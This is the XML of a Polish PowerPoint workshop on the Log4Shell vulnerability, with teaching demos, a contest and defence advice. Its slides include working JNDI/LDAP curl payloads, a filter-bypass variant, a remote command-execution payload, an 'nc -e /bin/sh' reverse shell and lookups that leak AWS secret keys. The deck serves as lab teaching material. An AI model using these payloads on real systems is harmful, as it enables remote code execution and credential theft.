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92" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="288" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="291" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="290" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="286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kaFTnRRZOTJ24JDvzKrSuELpk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F58720-AB5B-49C7-8484-EA3D589E2CB2}">
  <a:tblStyle styleId="{8DF58720-AB5B-49C7-8484-EA3D589E2C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8"/>
    <p:restoredTop sz="94720"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="211" d="100"/>
          <a:sy n="211" d="100"/>
        </p:scale>
        <p:origin x="141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84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04732d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1e04732d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68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29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490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3446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966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63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819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524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208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3626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691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449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780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079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26628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33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76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34.118.109.39:9000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55744A-5B43-F84F-85B8-AB2DEB6E1AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10458450" y="5634990"/>
            <a:ext cx="1733550" cy="113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2" name="Google Shape;124;p8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475D5942-3965-6643-BFF1-4791FEC2E7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LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0" err="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr sz="3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19593-B5E7-0148-B0A0-EC5BFA26D409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875160" y="2450637"/>
            <a:ext cx="956790" cy="1091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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 8" descr="Animal, bug, insect, virus, virus bug icon icon - Download on Iconfinder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3632450E-531B-554A-AE67-61F8107C4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579" y="2672424"/>
            <a:ext cx="647952" cy="6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ADDAD4-878F-9D4E-8339-1459176AE228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887713" y="2728818"/>
            <a:ext cx="1429129" cy="53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dirty="0"/>
              <a:t>request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CD9183E-25FB-684D-BBC2-C6B5392F8168}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655958" y="2870368"/>
            <a:ext cx="805398" cy="224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CCD499C-C168-A446-9BB7-9A1BB3D9DEC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8151887" y="2870368"/>
            <a:ext cx="805398" cy="224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B01D1A-1331-C047-8730-8C81674D7309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9256722" y="2672424"/>
            <a:ext cx="1429129" cy="53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r>
              <a:rPr lang="en-PL" dirty="0"/>
              <a:t>dap query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146208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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2444262" y="832569"/>
            <a:ext cx="94869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com.eniac.logger;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org.springframework.web.bind.annotation.GetMapping;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org.springframework.web.bind.annotation.RequestHeader;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org.springframework.web.bind.annotation.RestController;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org.apache.logging.log4j.LogManager;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MainController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static final Logger logger = LogManager.getLogger("HelloWorld");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counter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@GetMapping("/")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index(@RequestHeader("User-Agent") String userAgent)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logger.info("Received a request from User-Agent:" + userAgent);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"Log4Shell testowa aplikacja."+Integer.toString(counter++);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Uruchomienie aplikacji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docker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run --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rm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-p 8000:8000 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sowisz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/l4s-app1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http://localhost:8000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en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>url localhost 8000</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0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e04732d2e_0_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2943224" y="132024"/>
            <a:ext cx="8410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 err="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>CanaryTokens</a:t>
            </a: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 -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0" err="1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canarytokens.org</a:t>
            </a:r>
            <a:endParaRPr sz="3800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1D4D9-6692-134B-836D-38CAA0AC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800" y="1457724"/>
            <a:ext cx="9463349" cy="53181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 err="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Exploit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GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>curl -H </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'User-Agent${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>://x${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}.L4J.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>97lcm9o78k2ror6yaxi8w8go3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.canarytokens.com/a}' localhost:8000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http://localhost:8000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17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19367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Co może wyciekać?</a:t>
            </a:r>
            <a:endParaRPr sz="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018C9-89B5-4C4C-92BC-400F7822479E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2443163" y="1266141"/>
            <a:ext cx="609790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ourier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t># Docker Lookup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docker:containerId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docker:containerName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docker:imageId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docker:imageName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docker:shortContainerId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docker:shortImageId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# Environment Lookup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env:USER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env:user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env:COMPUTERNAME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env:USERDOMAIN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env:AWS_SECRET_ACCESS_KEY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hostName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env:JAVA_VERSION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# Java Lookup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java:version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java:runtime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java:vm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java:os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java:locale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java:hw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endParaRPr lang="en-PL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Demo #2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0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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409972" y="0"/>
            <a:ext cx="9486900" cy="649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com.eniac.logger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org.springframework.web.bind.annotation.GetMapping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org.springframework.web.bind.annotation.RequestHeader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org.springframework.web.bind.annotation.RestController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org.apache.logging.log4j.LogManager;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org.apache.logging.log4j.Logger;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MainController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LogManager.getLogger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("l4s-app2");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("/")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ala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RequestHeader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("User-Agent") String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userAgent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userAgent.toLowerCase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jndi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"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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logger.warn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("Attack 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detected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lvl="0"/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lang="pl-PL" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75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logger.info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("User-Agent:" + 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userAgent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"Log4Shell-app2:"+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Integer.toString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24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Uruchomienie aplikacji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docker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run --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rm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-p 9000:9000 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sowisz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/l4s-app2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http://localhost:9000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0698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Podpowiedź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4497705" y="2639379"/>
            <a:ext cx="2668906" cy="67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${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lower:j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}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ndi</a:t>
            </a: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136;p9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7D57C6-E5D6-594F-91E4-10EE1BA8FE6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067675" y="2639379"/>
            <a:ext cx="893445" cy="67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SzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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Jndi</a:t>
            </a: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SzPts val="2800"/>
              <a:buFont typeface="Arial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SzPts val="2800"/>
              <a:buFont typeface="Arial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SzPts val="2800"/>
              <a:buFont typeface="Arial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SzPts val="2800"/>
              <a:buNone/>
            </a:pP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https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://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github.com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Puliczek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/CVE-2021-44228-PoC-log4j-bypass-words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial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SzPts val="2800"/>
              <a:buFont typeface="Arial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2064F15E-CFE3-FA44-B31F-182C05F5D480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7145656" y="2754154"/>
            <a:ext cx="586739" cy="4457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4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sz="3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LOG4Shell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8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l-PL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Podatność dekady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 err="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Exploit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GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>curl -H </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'User-Agent${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>lower:j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>://x${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}.L4J.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>97lcm9o78k2ror6yaxi8w8go3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.canarytokens.com/a}’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>34.118.44.50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>:9000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46880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Demo #3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57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CVSSv3 score 10</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="log4shell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52618105-8A9A-1947-BD4E-0587374B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870" y="0"/>
            <a:ext cx="6310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55744A-5B43-F84F-85B8-AB2DEB6E1AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10458450" y="5634990"/>
            <a:ext cx="1733550" cy="113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8643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55744A-5B43-F84F-85B8-AB2DEB6E1AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10458450" y="5634990"/>
            <a:ext cx="1733550" cy="113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98C0DC-5A20-F548-886C-4392B03FF4A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499333" y="1093125"/>
            <a:ext cx="1526018" cy="1398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5" name="Picture 2" descr="malware Icon - Download malware Icon 2481506 | Noun Project">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FA5449-609E-4E49-B9D5-45231295E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10" y="1335350"/>
            <a:ext cx="787064" cy="7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992B33-0EE2-6248-B363-051159144D81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644669" y="284925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/>
              <a:t>x.x.x.x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1D6E58-83AD-984D-8347-CBA62FEA40E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8512616" y="1093125"/>
            <a:ext cx="1526018" cy="1398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1032" name="Picture 8" descr="Animal, bug, insect, virus, virus bug icon icon - Download on Iconfinder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F1B619-DAE5-6145-B579-10C7B21E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49" y="1399018"/>
            <a:ext cx="647952" cy="6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06BDE-1BE9-E344-8130-1F79ABFEF699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8313311" y="2797868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PL" dirty="0"/>
              <a:t>okalna aplikacja docker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592641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dirty="0" err="1"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
              <a:t>line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
              <a:t>payload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943224" y="1825625"/>
            <a:ext cx="8761095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>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL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attackhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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l-PL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x.x.x.x</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buNone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ts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>curl -H 'User-Agent:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>://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attackhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>:1389/Basic/Command/Base64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}’ localhost:9000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPts val="2800"/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SzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xxx – base64 encoded command to execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Np. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/hack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97473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Demo #4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15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dirty="0" err="1"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
              <a:t>line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
              <a:t>payload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943224" y="1825625"/>
            <a:ext cx="8761095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2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>nc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ip_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 15000 -e /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a: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70224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Konkurs #2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136;p9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7FECFE-0496-9848-B034-22C8B55D2D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2461260" y="19780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Adres: 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http://x.x.x.x:9000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Działa usługa podatna na log4shell</a:t>
            </a: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Wyciągnąć nazwę ostatniego użytkownika z /</a:t>
            </a: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passwd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ts val="2800"/>
              <a:buFont typeface="Arial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62516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Ochrona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77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Obrona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136;p9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7FECFE-0496-9848-B034-22C8B55D2D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308860" y="196659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457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="-"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Nie używać Javy (?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="520700" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="-"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Zaktualizować</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="520700" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="-"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Stara dobra zasada DMZ (usługa nie powinna mieć możliwości łączyć się do </a:t>
            </a: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internetu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Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> a to jest domyślnie włączone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ts val="2800"/>
              <a:buFont typeface="Arial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5016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3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101;p4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46A13DE-F1C1-E648-ACE4-CC1630B10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3225" y="1825625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Wstęp teoretyczny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Ćwiczenia praktyczne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konkurs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Bez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1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Docker’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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 się nie obejdzie.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C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4" name="Picture 2" descr="homepage-docker-logo - Docker Blog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEA41F6-A522-4148-8982-85BB6B62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99" y="3705225"/>
            <a:ext cx="2768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Log4J</a:t>
            </a:r>
            <a:endParaRPr sz="3800"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2943225" y="1825625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Używany w tysiącach projektów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De facto standard logowania w aplikacjach Java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Elastycznie konfigurowalny, bez konieczności modyfikacji aplikacji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3577" y="100013"/>
            <a:ext cx="38671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Log4J</a:t>
            </a:r>
            <a:endParaRPr sz="3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7310" y="1864669"/>
            <a:ext cx="90487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821" y="1050586"/>
            <a:ext cx="9321165" cy="45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CVSSv3 score 10</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/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2387" y="186259"/>
            <a:ext cx="6572250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CVSSv3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0" err="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>score</a:t>
            </a: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 10</a:t>
            </a:r>
            <a:endParaRPr sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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2943225" y="1825625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Severity 10 – tylko kilkanaście podatności rocznie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Różnica pomiędzy 9.8, a 10.0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b="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Scope changed </a:t>
            </a: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– tylko kilkanaście rocznie – wykorzystanie podatności 🡪 wyjście poza podatny komponent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Demo #1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188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971</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>147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Courier</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Motyw pakietu Office</vt:lpstr>
